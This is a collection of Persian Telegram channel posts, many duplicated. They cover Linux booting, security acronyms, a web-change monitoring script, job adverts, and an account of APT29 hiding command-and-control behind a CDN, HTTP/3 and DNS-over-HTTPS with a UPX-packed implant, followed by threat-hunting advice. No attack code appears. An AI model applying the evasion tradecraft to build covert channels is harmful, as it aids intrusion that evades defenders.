This media is not supported in your browser
VIEW IN TELEGRAM
فرایند بوت شدن لینوکس
در بلاگ بعد این فرایند تشریح خواهد شد
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
#BOOT #Linux #OS #CyberSecurity
در بلاگ بعد این فرایند تشریح خواهد شد
#BOOT #Linux #OS #CyberSecurity
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1👍1👨💻1🗿1
📢 فرآیند بوت لینوکس به زبان ساده 🐧
لینوکس چگونه بوت میشود؟ این تصویر بهصورت خلاصه و گامبهگام فرآیند بوت سیستمعامل لینوکس را نشان میدهد:
🔹 ۱. روشنکردن سیستم (Power On):
سیستم روشن میشود و سختافزار اولیه فعال میگردد.
🔹 ۲. اجرای BIOS/UEFI:
تشخیص دستگاههای متصل (Detect Devices).
بارگذاری تنظیمات از حافظه غیرفرار (Load from non-volatile memory).
اجرای تست سلامت سختافزار (POST).
🔹 ۳. بارگذاری GRUB:
خواندن فایل پیکربندی /etc/grub2.cfg.
اجرای کرنل لینوکس (Execute Kernel).
🔹 ۴. اجرای systemd (اولین پروسه در فضای کاربر):
بارگذاری کتابخانههای مورد نیاز (Load Supported Libraries).
اجرای فایلهای هدف (Run Target Files) مانند:
default.target
multi-user.target
basic.target
getty.target
🔹 ۵. اجرای اسکریپتهای راهاندازی:
/etc/profile
~/.bashrc
سرویسهایی مانند ssh.service و systemd-logind.
🔹 ۶. آمادهسازی سیستم برای کاربران:
سیستم آماده ورود کاربران میشود (Users can login now).
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
#BOOT #Linux #OS #CyberSecurity
لینوکس چگونه بوت میشود؟ این تصویر بهصورت خلاصه و گامبهگام فرآیند بوت سیستمعامل لینوکس را نشان میدهد:
🔹 ۱. روشنکردن سیستم (Power On):
سیستم روشن میشود و سختافزار اولیه فعال میگردد.
🔹 ۲. اجرای BIOS/UEFI:
تشخیص دستگاههای متصل (Detect Devices).
بارگذاری تنظیمات از حافظه غیرفرار (Load from non-volatile memory).
اجرای تست سلامت سختافزار (POST).
🔹 ۳. بارگذاری GRUB:
خواندن فایل پیکربندی /etc/grub2.cfg.
اجرای کرنل لینوکس (Execute Kernel).
🔹 ۴. اجرای systemd (اولین پروسه در فضای کاربر):
بارگذاری کتابخانههای مورد نیاز (Load Supported Libraries).
اجرای فایلهای هدف (Run Target Files) مانند:
default.target
multi-user.target
basic.target
getty.target
🔹 ۵. اجرای اسکریپتهای راهاندازی:
/etc/profile
~/.bashrc
سرویسهایی مانند ssh.service و systemd-logind.
🔹 ۶. آمادهسازی سیستم برای کاربران:
سیستم آماده ورود کاربران میشود (Users can login now).
#BOOT #Linux #OS #CyberSecurity
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2👏1🎉1🗿1
🛡 ۵۰ اصطلاح مهم دنیای امنیت سایبری که در ۲۰۲۵ باید بلد باشید!
✅ مفاهیم پایه امنیت:
🔸 CIA – محرمانگی، یکپارچگی، دسترسپذیری
🔸 APT – تهدید ماندگار پیشرفته
🔸 SOC – مرکز عملیات امنیت
🔸 SIEM – مدیریت اطلاعات و رویدادهای امنیتی
🔸 DLP – جلوگیری از نشت اطلاعات
🌐 امنیت شبکه و نقطه پایانی:
🔸 IDS – سیستم تشخیص نفوذ
🔸 IPS – سیستم جلوگیری از نفوذ
🔸 EDR – تشخیص و پاسخ نقطه پایانی
🔸 NAC – کنترل دسترسی به شبکه
🔸 UEBA – تحلیل رفتار کاربران و نهادها
🔐 مدیریت هویت و دسترسی:
🔸 IAM – مدیریت هویت و دسترسی
🔸 MFA – احراز هویت چندمرحلهای
🔸 SSO – ورود یکپارچه
🔸 RBAC – کنترل دسترسی مبتنی بر نقش
🔸 PAM – مدیریت دسترسی ممتاز
🧠 اطلاعات تهدید و بدافزار:
🔸 IOC – نشانگرهای نفوذ
🔸 TTP – تاکتیکها، تکنیکها، روشها
🔸 MITRE ATT&CK – پایگاه دانش رفتارهای مهاجم
🔸 C2 – فرمان و کنترل
🔸 RAT – تروجان دسترسی از راه دور
☁️ امنیت وب، اپلیکیشن و فضای ابری:
🔸 WAF – فایروال اپلیکیشن وب
🔸 CASB – واسط امنیتی دسترسی به فضای ابری
🔸 SAST – تست امنیت ایستای کد
🔸 DAST – تست امنیت پویا
🔸 CSPM – مدیریت وضعیت امنیت فضای ابری
📋 ریسک و تطابق با قوانین:
🔸 GRC – حاکمیت، ریسک و انطباق
🔸 PII – اطلاعات شناسایی شخصی
🔸 GDPR – مقررات حفاظت از داده اتحادیه اروپا
🔸 HIPAA – قانون حفاظت اطلاعات سلامت
🔸 SOX – قانون ساربنز-آکسلی
🚨 واکنش به رخداد و تداوم کسبوکار:
🔸 IR – پاسخ به رخداد
🔸 BCP – برنامه تداوم کسبوکار
🔸 DRP – برنامه بازیابی از فاجعه
🔸 MTTR – میانگین زمان بازیابی
🔸 RTO – هدف زمان بازیابی
🧩 چارچوبهای امنیت سایبری:
🔸 NIST – مؤسسه استانداردهای ملی آمریکا
🔸 ISO – سازمان بینالمللی استانداردسازی
🔸 CIS – مرکز امنیت اینترنت
🔸 CMMC – گواهی بلوغ امنیت سایبری
🔸 COBIT – اهداف کنترلی برای فناوری اطلاعات
💣 تهدیدات و اکسپلویتها:
🔸 DoS – حمله محرومسازی از سرویس
🔸 DDoS – حمله توزیعشده محرومسازی
🔸 XSS – اسکریپتنویسی بین سایتی
🔸 SQLi – تزریق SQL
🔸 MITM – مرد میانی
🚀 فناوریهای نوظهور و ابزارهای امنیتی:
🔸 SOAR – ارکستراسیون و خودکارسازی امنیت
🔸 XDR – تشخیص و پاسخ گسترده
🔸 ZTA – معماری اعتماد صفر
🔸 SASE – دسترسی ایمن به لبه سرویس
🔸 CNAPP – پلتفرم حفاظت از اپلیکیشنهای ابری بومی
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
#Blog #CyberSecurity
✅ مفاهیم پایه امنیت:
🔸 CIA – محرمانگی، یکپارچگی، دسترسپذیری
🔸 APT – تهدید ماندگار پیشرفته
🔸 SOC – مرکز عملیات امنیت
🔸 SIEM – مدیریت اطلاعات و رویدادهای امنیتی
🔸 DLP – جلوگیری از نشت اطلاعات
🌐 امنیت شبکه و نقطه پایانی:
🔸 IDS – سیستم تشخیص نفوذ
🔸 IPS – سیستم جلوگیری از نفوذ
🔸 EDR – تشخیص و پاسخ نقطه پایانی
🔸 NAC – کنترل دسترسی به شبکه
🔸 UEBA – تحلیل رفتار کاربران و نهادها
🔐 مدیریت هویت و دسترسی:
🔸 IAM – مدیریت هویت و دسترسی
🔸 MFA – احراز هویت چندمرحلهای
🔸 SSO – ورود یکپارچه
🔸 RBAC – کنترل دسترسی مبتنی بر نقش
🔸 PAM – مدیریت دسترسی ممتاز
🧠 اطلاعات تهدید و بدافزار:
🔸 IOC – نشانگرهای نفوذ
🔸 TTP – تاکتیکها، تکنیکها، روشها
🔸 MITRE ATT&CK – پایگاه دانش رفتارهای مهاجم
🔸 C2 – فرمان و کنترل
🔸 RAT – تروجان دسترسی از راه دور
☁️ امنیت وب، اپلیکیشن و فضای ابری:
🔸 WAF – فایروال اپلیکیشن وب
🔸 CASB – واسط امنیتی دسترسی به فضای ابری
🔸 SAST – تست امنیت ایستای کد
🔸 DAST – تست امنیت پویا
🔸 CSPM – مدیریت وضعیت امنیت فضای ابری
📋 ریسک و تطابق با قوانین:
🔸 GRC – حاکمیت، ریسک و انطباق
🔸 PII – اطلاعات شناسایی شخصی
🔸 GDPR – مقررات حفاظت از داده اتحادیه اروپا
🔸 HIPAA – قانون حفاظت اطلاعات سلامت
🔸 SOX – قانون ساربنز-آکسلی
🚨 واکنش به رخداد و تداوم کسبوکار:
🔸 IR – پاسخ به رخداد
🔸 BCP – برنامه تداوم کسبوکار
🔸 DRP – برنامه بازیابی از فاجعه
🔸 MTTR – میانگین زمان بازیابی
🔸 RTO – هدف زمان بازیابی
🧩 چارچوبهای امنیت سایبری:
🔸 NIST – مؤسسه استانداردهای ملی آمریکا
🔸 ISO – سازمان بینالمللی استانداردسازی
🔸 CIS – مرکز امنیت اینترنت
🔸 CMMC – گواهی بلوغ امنیت سایبری
🔸 COBIT – اهداف کنترلی برای فناوری اطلاعات
💣 تهدیدات و اکسپلویتها:
🔸 DoS – حمله محرومسازی از سرویس
🔸 DDoS – حمله توزیعشده محرومسازی
🔸 XSS – اسکریپتنویسی بین سایتی
🔸 SQLi – تزریق SQL
🔸 MITM – مرد میانی
🚀 فناوریهای نوظهور و ابزارهای امنیتی:
🔸 SOAR – ارکستراسیون و خودکارسازی امنیت
🔸 XDR – تشخیص و پاسخ گسترده
🔸 ZTA – معماری اعتماد صفر
🔸 SASE – دسترسی ایمن به لبه سرویس
🔸 CNAPP – پلتفرم حفاظت از اپلیکیشنهای ابری بومی
#Blog #CyberSecurity
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2👍1🎉1🗿1
https://github.com/TryHackBox/Kaveh-WebDiff-Monitor
توضیحات ابزار :
این ابزار یک مانیتورینگ تغییرات و وضعیت HTTP است که برای بررسی سلامت سرویسهای وب، مانیتورینگ Virtual Hostها و شناسایی تغییرات محتوا استفاده میشود.
با استفاده از این اسکریپت میتوانید چندین IP/Port/Schema/Vhost را به صورت دورهای بررسی کنید و در صورت تغییر وضعیت پاسخ یا تغییر در محتوای صفحه، هشدار دریافت کنید.
ویژگیها
نظارت زمانبندیشده: اجرای خودکار در بازههای زمانی مشخص.
پشتیبانی از HTTP و HTTPS با امکان نادیده گرفتن خطاهای SSL.
Virtual Host Routing:
اتصال مستقیم به IP با هدر Host سفارشی (مناسب برای تست دامنههای روی یک سرور).
بررسی تغییر محتوا بر اساس تعداد کلمات و کد وضعیت HTTP.
ذخیرهسازی وضعیتها در فایل /tmp/http_mon.log برای مقایسه.
قابل استفاده در تست نفوذ برای شناسایی تغییرات، از کار افتادن سرویس یا تغییرات مشکوک.
نحوه اجرا در لینوکس
1. اسکریپت را کلون یا دانلود کنید:
2. یک فایل متنی شامل لیست اهداف ایجاد کنید (هر خط شامل IP، پورت، پروتکل و vhost):
192.168.1.10 443 https example.com
10.0.0.5 80 http test.local
3. اجرای اسکریپت:
4. خروجی نمونه:
Fri Aug 15 23:45:05 UTC 2025
[*] 192.168.1.10 443 example.com: 200 157
[*] 10.0.0.5 80 test.local: 404 12
[!] تغییر وضعیت برای example.com
کاربرد در تست نفوذ
در فرایند تست نفوذ، این ابزار میتواند نقش مهمی داشته باشد:
شناسایی تغییرات در محتوای وب در زمان انجام حملات (مثلاً تغییر پیام خطا بعد از تزریق).
نظارت مداوم Virtual Hostها برای پیدا کردن دامنههای در حال توسعه یا فعال شدن سرویسهای مخفی.
ردیابی پاسخ سرور بعد از تستهای سنگین (مانند تست فشار یا ارسال حجم بالای درخواست ها).
شناسایی قطع سرویس یا تغییر پیکربندی در زمان حملات Man-in-the-Middle یا Bypass WAF.
کمک به فاز Post-Exploitation برای تشخیص تغییرات ایجادشده توسط شما یا تیم قرمز روی سیستم تارگت.
نکات
مسیر /tmp/http_mon.log در هر بار بوت ریست میشود؛ در صورت نیاز میتوانید آن را به مسیر دائمی تغییر دهید.
برای استفاده در شبکههای بزرگ یا اسکن همزمان چند صد تارگت، پیشنهاد میشود بازه زمانی (INTERVAL) را متناسب افزایش دهید تا فشار روی سیستم تارگت کم شود.
این ابزار نیاز به curl و محیط Bash دارد.
اگر این ابزار براتون مفید بود استارز یادتون نشه
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
توضیحات ابزار :
این ابزار یک مانیتورینگ تغییرات و وضعیت HTTP است که برای بررسی سلامت سرویسهای وب، مانیتورینگ Virtual Hostها و شناسایی تغییرات محتوا استفاده میشود.
با استفاده از این اسکریپت میتوانید چندین IP/Port/Schema/Vhost را به صورت دورهای بررسی کنید و در صورت تغییر وضعیت پاسخ یا تغییر در محتوای صفحه، هشدار دریافت کنید.
ویژگیها
نظارت زمانبندیشده: اجرای خودکار در بازههای زمانی مشخص.
پشتیبانی از HTTP و HTTPS با امکان نادیده گرفتن خطاهای SSL.
Virtual Host Routing:
اتصال مستقیم به IP با هدر Host سفارشی (مناسب برای تست دامنههای روی یک سرور).
بررسی تغییر محتوا بر اساس تعداد کلمات و کد وضعیت HTTP.
ذخیرهسازی وضعیتها در فایل /tmp/http_mon.log برای مقایسه.
قابل استفاده در تست نفوذ برای شناسایی تغییرات، از کار افتادن سرویس یا تغییرات مشکوک.
نحوه اجرا در لینوکس
1. اسکریپت را کلون یا دانلود کنید:
git clone https://github.com/TryHackBox/Kaveh-WebDiff-Monitor.git
cd Kaveh-WebDiff-Monitor
chmod +x Kaveh-Webdiff-Monitor.sh
2. یک فایل متنی شامل لیست اهداف ایجاد کنید (هر خط شامل IP، پورت، پروتکل و vhost):
192.168.1.10 443 https example.com
10.0.0.5 80 http test.local
3. اجرای اسکریپت:
./Kaveh-Webdiff-Monitor.sh targets.txt
4. خروجی نمونه:
Fri Aug 15 23:45:05 UTC 2025
[*] 192.168.1.10 443 example.com: 200 157
[*] 10.0.0.5 80 test.local: 404 12
[!] تغییر وضعیت برای example.com
کاربرد در تست نفوذ
در فرایند تست نفوذ، این ابزار میتواند نقش مهمی داشته باشد:
شناسایی تغییرات در محتوای وب در زمان انجام حملات (مثلاً تغییر پیام خطا بعد از تزریق).
نظارت مداوم Virtual Hostها برای پیدا کردن دامنههای در حال توسعه یا فعال شدن سرویسهای مخفی.
ردیابی پاسخ سرور بعد از تستهای سنگین (مانند تست فشار یا ارسال حجم بالای درخواست ها).
شناسایی قطع سرویس یا تغییر پیکربندی در زمان حملات Man-in-the-Middle یا Bypass WAF.
کمک به فاز Post-Exploitation برای تشخیص تغییرات ایجادشده توسط شما یا تیم قرمز روی سیستم تارگت.
نکات
مسیر /tmp/http_mon.log در هر بار بوت ریست میشود؛ در صورت نیاز میتوانید آن را به مسیر دائمی تغییر دهید.
برای استفاده در شبکههای بزرگ یا اسکن همزمان چند صد تارگت، پیشنهاد میشود بازه زمانی (INTERVAL) را متناسب افزایش دهید تا فشار روی سیستم تارگت کم شود.
این ابزار نیاز به curl و محیط Bash دارد.
اگر این ابزار براتون مفید بود استارز یادتون نشه
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - TryHackBox/Kaveh-WebDiff-Monitor: HTTP/S Service Monitor Script This Bash noscript periodically monitors the availability…
HTTP/S Service Monitor Script This Bash noscript periodically monitors the availability and content of web services (HTTP/HTTPS) specified in an input file. It checks each service at regular interva...
❤3👏1🤩1👨💻1🗿1
#فرصت_شغلی
#مانیتورینگ
#zabbix
#noc
سلام به دوستان و همکاران عزیز
یک شرکت خصوصی در حوزه ی بانکی ، جهت تکمیل نیروی فنی واحد مانیتورینگ شبکه و سرویس ، از افراد واجد شرایط زیر دعوت به همکاری مینماید:
عنوان شغلی: کارشناس توسعه ی مانیتورینگ
وظایف:
توسعه و نگهداری سامانه ی مانیتورینگ زبیکس
مهارتها و تواناییها:
تسلط بر نرمافزار مانیتورینگ Zabbix
توانایی مانیتور کردن شبکه و زیرساخت ، دیتابیس ها ، اپلیکیشن ها و سرویس ها با نرمافزار زبیکس
آشنایی با مفاهیم لینوکس در حد مدرک LPIC-1
آشنایی با ELK
توانایی تحلیل مشکلات شبکه و سرورها
دقت و مسئولیتپذیری بالا
آشنایی با دورههای splunk ، ccna و grafana مزیت محسوب میشود.
لطفا رزومه ی خود را از طریق دایرکت لینکدین و یا سایت جابینجا ارسال بفرمایید.
https://jobinja.ir/1391768
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
#مانیتورینگ
#zabbix
#noc
سلام به دوستان و همکاران عزیز
یک شرکت خصوصی در حوزه ی بانکی ، جهت تکمیل نیروی فنی واحد مانیتورینگ شبکه و سرویس ، از افراد واجد شرایط زیر دعوت به همکاری مینماید:
عنوان شغلی: کارشناس توسعه ی مانیتورینگ
وظایف:
توسعه و نگهداری سامانه ی مانیتورینگ زبیکس
مهارتها و تواناییها:
تسلط بر نرمافزار مانیتورینگ Zabbix
توانایی مانیتور کردن شبکه و زیرساخت ، دیتابیس ها ، اپلیکیشن ها و سرویس ها با نرمافزار زبیکس
آشنایی با مفاهیم لینوکس در حد مدرک LPIC-1
آشنایی با ELK
توانایی تحلیل مشکلات شبکه و سرورها
دقت و مسئولیتپذیری بالا
آشنایی با دورههای splunk ، ccna و grafana مزیت محسوب میشود.
لطفا رزومه ی خود را از طریق دایرکت لینکدین و یا سایت جابینجا ارسال بفرمایید.
https://jobinja.ir/1391768
Please open Telegram to view this post
VIEW IN TELEGRAM
#دعوت_به_همکاری
با سلام ؛
مجموعهی ارویس جهت تکمیل کادر فنی خود از کارشناسان واجد شرایط زیر دعوت به همکاری مینماید :
۱-تسلط به مباحث زیرساخت شبکه در سطح CCNP
۲-آشنا با فایروال ها از جمله Sophos و Fortigate
۳-آشنایی کلی با سرویس های ماکروسافتی
۴-اتمام و یا معافیت خدمت سربازی
مزایا:بیمه تکمیلی و ناهار
ساعت کاری : ۷ الی ۱۶
برای ارسال رزومه به شرکت تماس بگیرید
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
با سلام ؛
مجموعهی ارویس جهت تکمیل کادر فنی خود از کارشناسان واجد شرایط زیر دعوت به همکاری مینماید :
۱-تسلط به مباحث زیرساخت شبکه در سطح CCNP
۲-آشنا با فایروال ها از جمله Sophos و Fortigate
۳-آشنایی کلی با سرویس های ماکروسافتی
۴-اتمام و یا معافیت خدمت سربازی
مزایا:بیمه تکمیلی و ناهار
ساعت کاری : ۷ الی ۱۶
برای ارسال رزومه به شرکت تماس بگیرید
Please open Telegram to view this post
VIEW IN TELEGRAM
وقتی اعضای تیم #المپیادنجوم فهمیدند هر پنج نفر #طلا بردند.
اعضای تیم ایران در این رقابتها شامل حسین سلطانی، هیربد فودازی، حسین معصومی، ارشیا میرشمسی کاخکی و علی نادری لردجانی هستند که توانستند با کسب ۵ نشان طلا، قهرمان مسابقات جهانی هند ۲۰۲۵ شوند.
امیدوارم عالی باشند و سالم
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
اعضای تیم ایران در این رقابتها شامل حسین سلطانی، هیربد فودازی، حسین معصومی، ارشیا میرشمسی کاخکی و علی نادری لردجانی هستند که توانستند با کسب ۵ نشان طلا، قهرمان مسابقات جهانی هند ۲۰۲۵ شوند.
امیدوارم عالی باشند و سالم
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4
🎯 حمله سایبری APT29 با C2 نامرئی – ترکیب CDN، HTTP/3 و DoH
در سال ۱۴۰۲، سازمان امنیت ملی آمریکا و شرکت امنیتی Mandiant اعلام کردند که گروه هکری APT29، وابسته به سرویس اطلاعات خارجی روسیه، موفق شدهاند به یکی از نهادهای دیپلماتیک ایالات متحده نفوذ کنند.
آنچه این عملیات را به یکی از پیچیدهترین حملات سایبری اخیر تبدیل کرد، زیرساخت فرماندهی و کنترل (C2) آن بود که عملا از دید هر سیستم مانیتورینگ پنهان مانده بود.
فاز اول – پنهانسازی C2 پشت شبکه توزیع محتوا (CDN)
به جای استفاده از یک سرور C2 مستقیم، مهاجمان دامنهای مشابه سرویسهای بهروزرسانی رسمی ثبت کردند و آن را از طریق Cloudflare به سرور واقعی خود مسیردهی کردند.
مزیت این کار:
تمام ارتباطات با C2 در قالب ترافیک HTTPS معتبر به یک CDN شناختهشده انجام میشد.
سیستمهای امنیتی مقصد فقط «cloudflare.com» را به عنوان مقصد میدیدند.
امکان بلاک کردن ترافیک بدون اختلال گسترده در سرویسهای دیگر تقریبا وجود نداشت.
فاز دوم – استفاده از پروتکل HTTP/3 مبتنی بر QUIC
به جای HTTP/1.1 یا HTTP/2، مهاجمان از HTTP/3 روی بستر QUIC بهره بردند.
این انتخاب چند مزیت حیاتی داشت:
برقراری ارتباط روی UDP/443 به جای TCP، که بسیاری از ابزارهای NIDS/IPS بهخوبی آن را تحلیل نمیکنند.
رمزگذاری لایه حمل به شکلی که حتی پس از TLS Inspection، الگوهای ترافیکی شناساییپذیر نباشند. امکان تغییر مسیر و زیرساخت با حداقل وقفه در صورت شناسایی.
فاز سوم – مخفیسازی درخواستهای DNS با DoH
در این روش، درخواستهای DNS سنتی روی پورت ۵۳ حذف شده و به جای آن از DNS over HTTPS استفاده شد.
به این ترتیب:
هر Query به شکل یک درخواست HTTPS رمزگذاریشده به سرور DoH (مثلاً
هیچ لاگ قابلمشاهدهای در DNS Resolver سازمان مقصد وجود نداشت.
تشخیص دامنههای مخرب از روی ترافیک شبکه بهشدت دشوار شد.
فاز چهارم – بارگذاری و اجرای Implant
مهاجمان از طریق فایلهای فیشینگ (ISO یا Word با ماکرو)، یک Implant نوشتهشده با Golang را روی سیستم قربانی مستقر کردند.
ویژگیهای این Implant:
کراسپلتفرم بودن (Windows/Linux)
فشردهسازی با UPX برای جلوگیری از شناسایی توسط آنتیویروسها
برقراری Beacon نامنظم به دامنه C2 از طریق HTTP/3 و DoH
پشتیبانی از اجرای فرمان، استخراج فایلها و حرکت جانبی (Lateral Movement) در شبکه داخلی
فاز پنجم – فرار از شناسایی
ترکیب این سه تکنیک (CDN + HTTP/3 + DoH) باعث شد:
ترافیک C2 با ترافیک عادی مرورگرها یکسان به نظر برسد.
ابزارهای امنیتی سنتی هیچ الگوی مشخصی از Beaconing پیدا نکنند.
حتی تحلیلگران SOC، بدون استفاده از روشهای پیشرفته تحلیل متادیتا، نتوانند ارتباطات مخرب را از عادی تفکیک کنند.
روشهای شکار (Threat Hunting)
برای مقابله با چنین حملاتی، نیاز به پایش سطح پیشرفته وجود دارد:
پروفایلسازی ترافیک QUIC و شناسایی ارتباطات غیرمرورگری روی UDP/443
بررسی Fingerprintهای TLS/JA3 و مقایسه با مرورگرهای استاندارد
تحلیل طول بستهها و فواصل زمانی ارسال آنها (Traffic Flow Analysis)
ایجاد لیست سفید برای سرورهای DoH و مسدودسازی موارد غیرمجاز
📌 نتیجهگیری:
این حمله نشان میدهد که گروههای پیشرفته (APT) دیگر نیازی به دامنههای مشکوک یا پورتهای غیرمعمول ندارند.
امروز، زیرساختهای قانونی مثل Cloudflare، Akamai و پروتکلهای مدرن مانند HTTP/3 و DoH میتوانند به راحتی به سپر نامرئی برای C2 مهاجمان تبدیل شوند.
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
در سال ۱۴۰۲، سازمان امنیت ملی آمریکا و شرکت امنیتی Mandiant اعلام کردند که گروه هکری APT29، وابسته به سرویس اطلاعات خارجی روسیه، موفق شدهاند به یکی از نهادهای دیپلماتیک ایالات متحده نفوذ کنند.
آنچه این عملیات را به یکی از پیچیدهترین حملات سایبری اخیر تبدیل کرد، زیرساخت فرماندهی و کنترل (C2) آن بود که عملا از دید هر سیستم مانیتورینگ پنهان مانده بود.
فاز اول – پنهانسازی C2 پشت شبکه توزیع محتوا (CDN)
به جای استفاده از یک سرور C2 مستقیم، مهاجمان دامنهای مشابه سرویسهای بهروزرسانی رسمی ثبت کردند و آن را از طریق Cloudflare به سرور واقعی خود مسیردهی کردند.
مزیت این کار:
تمام ارتباطات با C2 در قالب ترافیک HTTPS معتبر به یک CDN شناختهشده انجام میشد.
سیستمهای امنیتی مقصد فقط «cloudflare.com» را به عنوان مقصد میدیدند.
امکان بلاک کردن ترافیک بدون اختلال گسترده در سرویسهای دیگر تقریبا وجود نداشت.
فاز دوم – استفاده از پروتکل HTTP/3 مبتنی بر QUIC
به جای HTTP/1.1 یا HTTP/2، مهاجمان از HTTP/3 روی بستر QUIC بهره بردند.
این انتخاب چند مزیت حیاتی داشت:
برقراری ارتباط روی UDP/443 به جای TCP، که بسیاری از ابزارهای NIDS/IPS بهخوبی آن را تحلیل نمیکنند.
رمزگذاری لایه حمل به شکلی که حتی پس از TLS Inspection، الگوهای ترافیکی شناساییپذیر نباشند. امکان تغییر مسیر و زیرساخت با حداقل وقفه در صورت شناسایی.
فاز سوم – مخفیسازی درخواستهای DNS با DoH
در این روش، درخواستهای DNS سنتی روی پورت ۵۳ حذف شده و به جای آن از DNS over HTTPS استفاده شد.
به این ترتیب:
هر Query به شکل یک درخواست HTTPS رمزگذاریشده به سرور DoH (مثلاً
cloudflare-dns.com) ارسال میشد.هیچ لاگ قابلمشاهدهای در DNS Resolver سازمان مقصد وجود نداشت.
تشخیص دامنههای مخرب از روی ترافیک شبکه بهشدت دشوار شد.
فاز چهارم – بارگذاری و اجرای Implant
مهاجمان از طریق فایلهای فیشینگ (ISO یا Word با ماکرو)، یک Implant نوشتهشده با Golang را روی سیستم قربانی مستقر کردند.
ویژگیهای این Implant:
کراسپلتفرم بودن (Windows/Linux)
فشردهسازی با UPX برای جلوگیری از شناسایی توسط آنتیویروسها
برقراری Beacon نامنظم به دامنه C2 از طریق HTTP/3 و DoH
پشتیبانی از اجرای فرمان، استخراج فایلها و حرکت جانبی (Lateral Movement) در شبکه داخلی
فاز پنجم – فرار از شناسایی
ترکیب این سه تکنیک (CDN + HTTP/3 + DoH) باعث شد:
ترافیک C2 با ترافیک عادی مرورگرها یکسان به نظر برسد.
ابزارهای امنیتی سنتی هیچ الگوی مشخصی از Beaconing پیدا نکنند.
حتی تحلیلگران SOC، بدون استفاده از روشهای پیشرفته تحلیل متادیتا، نتوانند ارتباطات مخرب را از عادی تفکیک کنند.
روشهای شکار (Threat Hunting)
برای مقابله با چنین حملاتی، نیاز به پایش سطح پیشرفته وجود دارد:
پروفایلسازی ترافیک QUIC و شناسایی ارتباطات غیرمرورگری روی UDP/443
بررسی Fingerprintهای TLS/JA3 و مقایسه با مرورگرهای استاندارد
تحلیل طول بستهها و فواصل زمانی ارسال آنها (Traffic Flow Analysis)
ایجاد لیست سفید برای سرورهای DoH و مسدودسازی موارد غیرمجاز
📌 نتیجهگیری:
این حمله نشان میدهد که گروههای پیشرفته (APT) دیگر نیازی به دامنههای مشکوک یا پورتهای غیرمعمول ندارند.
امروز، زیرساختهای قانونی مثل Cloudflare، Akamai و پروتکلهای مدرن مانند HTTP/3 و DoH میتوانند به راحتی به سپر نامرئی برای C2 مهاجمان تبدیل شوند.
Please open Telegram to view this post
VIEW IN TELEGRAM
ما در Barook | باروک دنبال یه نگهبان سایبری #Cyber_Security پرشور میگردیم!
اگر تو از اونایی هستی که با کشف یه آسیبپذیری ذوق میکنی، از خنثی کردن تهدیدات سایبری کیف میکنی و عاشق اینی که شبکهها و سیستمها رو مثل یه قلعه نفوذ ناپذیرکنی🛡، جای تو توی تیم ما خالیه!
🔶چی ازت میخوایم؟
🔹تسلط به ابزارهای امنیتی مثل Nessus، Nmap،فایروالها و سیستمهای SIEM
🔹تجربه واقعی کار با تهدیدات سایبری (نه فقط سناریوهای تمرینی)
🔹آشنایی با استانداردهای امنیتی مثل ISO 27001، NIST یا CIS
🔹مهارت تو تست نفوذ، تحلیل ریسک و مستندسازی حرفهای
🔹خلاقیت تو پیدا کردن راهکارهای امنیتی و حل مسئله
🔹روحیه تیمی و توانایی کار تو محیط سریع و پرچالش
🔷چی برات داریم؟
🔸یه تیم باحال، حرفهای و بدون حاشیه
🔸فضای رشد، یادگیری و دیده شدن ایدههات
🔸پروژههایی که واقعاً امنیت سازمان رو متحول میکنن
🔸ساعت کاری منعطف و محیطی که توش راحتی
حس میکنی این شغل برات ساخته شده؟
بیا با هم دنیای سایبری رو امنتر کنیم!
📩 رزومهتو بفرست به لینک زیر یا یه پیام بده که بتونیم گپ بزنیم.
https://B2n.ir/yq7413
#استخدام
#کارشناس_امنیت_فناوری_اطلاعات
#IT_Security_Specialist
#Cyber_Security
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
اگر تو از اونایی هستی که با کشف یه آسیبپذیری ذوق میکنی، از خنثی کردن تهدیدات سایبری کیف میکنی و عاشق اینی که شبکهها و سیستمها رو مثل یه قلعه نفوذ ناپذیرکنی🛡، جای تو توی تیم ما خالیه!
🔶چی ازت میخوایم؟
🔹تسلط به ابزارهای امنیتی مثل Nessus، Nmap،فایروالها و سیستمهای SIEM
🔹تجربه واقعی کار با تهدیدات سایبری (نه فقط سناریوهای تمرینی)
🔹آشنایی با استانداردهای امنیتی مثل ISO 27001، NIST یا CIS
🔹مهارت تو تست نفوذ، تحلیل ریسک و مستندسازی حرفهای
🔹خلاقیت تو پیدا کردن راهکارهای امنیتی و حل مسئله
🔹روحیه تیمی و توانایی کار تو محیط سریع و پرچالش
🔷چی برات داریم؟
🔸یه تیم باحال، حرفهای و بدون حاشیه
🔸فضای رشد، یادگیری و دیده شدن ایدههات
🔸پروژههایی که واقعاً امنیت سازمان رو متحول میکنن
🔸ساعت کاری منعطف و محیطی که توش راحتی
حس میکنی این شغل برات ساخته شده؟
بیا با هم دنیای سایبری رو امنتر کنیم!
📩 رزومهتو بفرست به لینک زیر یا یه پیام بده که بتونیم گپ بزنیم.
https://B2n.ir/yq7413
#استخدام
#کارشناس_امنیت_فناوری_اطلاعات
#IT_Security_Specialist
#Cyber_Security
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1
سلام
تیم Ciclo (استارتاپ فعال گروه گلرنگ ونچرز) دنبال دو همتیمی پرانرژی هست تا با هم مسیر رشد و توسعه اپلیکیشنمون رو جلو ببریم! اگر تجربه یا علاقه دارید تو فضای استارتاپی کار کنید، خوشحال میشیم پیام بدید.
موقعیتها:
Front-end developer (React Native / PWA)
Back-end developer (Python / Django)
📩 رزومهتون رو میتونید به این آدرس بفرستید یا از طریق لینکدین با من در تماس باشید:
manihamzezadehz@gmail.com
#استخدام
#ریموت
#فرصت_شغلی
#استارتاپ
#Hiring
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
